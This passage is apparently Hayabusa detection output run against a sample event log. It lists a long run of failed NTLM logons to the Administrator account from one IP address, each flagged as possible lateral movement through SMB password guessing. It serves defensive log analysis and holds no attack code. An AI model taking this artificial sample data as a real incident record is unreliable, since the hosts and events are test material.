+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2W9BbDYgC6vhqU3o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6DYsaih1Yhb2uOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q4o93QpJL4pxx94q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lQf1OsHb4lpgMPbl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HcJUYelneVqBQjr9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I0d6daEeIadJRbBI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SQ1hvZeT9aulbu4g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75RBCjr2eRDLhTqW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: maMlpuzhleuQHhIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkpNfbOHUr7cY52z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R7SUyYbLPfPAGUfw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7clwftf7R0uNbqJ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IsIyPcMAPnlxJa12 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4CKcyo1Ec4rs3Z2g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZlzKvZLO8CDotkbE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EyRpYYtmD8389Yvp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t3Pg0H9Gncoyr45m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zksaaJ7Z1wuy4PMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WdYAEdfWxLdM1rh : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VyYFJRy0cxPfqDFh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hv2Lz1h1bG6UatVR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FLKPLfEe3PpEzRNc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJWv7ggzCSyEznOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZUtR9CNfKMHQMd7T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6fYNHuRTqi15cRkL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DvxZHwJwrBYXlEyv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jscJTJjhKvCtDl8q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZEIEjcimMyHWUsp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 30OdVRH9ZATLezsR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJ1OSBVZHKmyOzj8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JanG6Q0oYpTdm9mC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PWCwDYL3T7TAdb0J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mRdyZaio1HjUKlNQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VjiRnExy9TzZTG0R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ztUyQpl8c9RoAr1j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jC23QAFM07q7cfVo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TSM8lmdOFoDslQNa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sGZaUGAT1oXmnGLB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZMNo21pTA67pb7Go : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EiTZCqK3m4icL1Vi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZaZ2mnoihX1Ec4di : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ihm9zaXkmWklXk4u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yLIZ3tlw9VlQmK28 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GVHzJHTi55NbxXYY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1FROeEnMLna2fTTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pio6ZZ9pV0pS2Whi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h1aD2w5U5K9ND5HV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zF8Jb4GpG4D3xn9i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Edv4GwGfL156V1xe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Irvneva9RFn44iII : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dHtJFI8OL9kJylL5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F5Q4h62T77hGjhKe : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdSALwo9td9xUeBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1kYfoqz1r1NuEn04 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7X400gufqdunUa8j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lLR8z7g0GY8r7a1r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QHMztrxiKBGtNqkp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7eBQevVhmZs5gHFD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lyQCs0PG6fGzpidu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnsPjnCieyoFIbJZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ku6mjVaG1lCJrAo1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VwiyVIWHOGuHzhdO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 92v1rXcj5c0Lt3OF : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yO2JYd6FfM2Y7px9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ltr5g8ZWUAdrPKxg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fjiPMy5uOTbbmaQ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HDRVOzxca9wDJziV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DV28RjUK26Je2Dr9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seoetT43w0S3FEss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IdIU9Q9Ig4Bd3Aps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGzuHSHT59Qnp5jI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wPA1J7aQrZ064WSf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhLFXDMUKGfdoc4S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: apVAhc6o3dhLmUll : IP Address: 192.168.198.149 : AuthPackage: 
